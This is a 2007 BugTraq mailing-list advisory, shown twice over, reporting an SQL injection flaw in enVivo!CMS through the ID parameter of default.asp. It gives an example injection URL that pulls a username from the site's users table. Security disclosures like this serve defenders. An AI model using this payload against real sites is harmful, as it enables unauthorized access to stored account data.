BugTraq
Back to list
|
Post reply
durito: enVivo!CMS SQL injection
Jul 11 2007 08:29AM
3APA3A (3APA3A SECURITY NNOV RU)
Dear bugtraq (at) securityfocus (dot) com [email concealed],
durito [damagelab] -durito[at]mail[dot]ru- reported SQL injection
vulnerability in enVivo!CMS through ID parameter of default.asp.
Example:
http://www.example.com/default.asp?action=article&ID=-1+or+1=(SELECT+TOP
+1+username+from+users)--
Original message (in Russian): http://securityvulns.ru/Rdocument425.html
--
http://securityvulns.com/
/\_/ { , . } |+--oQQo->{ ^ }<-----+ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
|/
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
durito [damagelab] -durito[at]mail[dot]ru- reported SQL injection
vulnerability in enVivo!CMS through ID parameter of default.asp.
Example:
http://www.example.com/default.asp?action=article&ID=-1+or+1=(SELECT+TOP
+1+username+from+users)--
Original message (in Russian): http://securityvulns.ru/Rdocument425.html
--
http://securityvulns.com/
/\_/ { , . } |+--oQQo->{ ^ }<-----+ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
|/
[ reply ]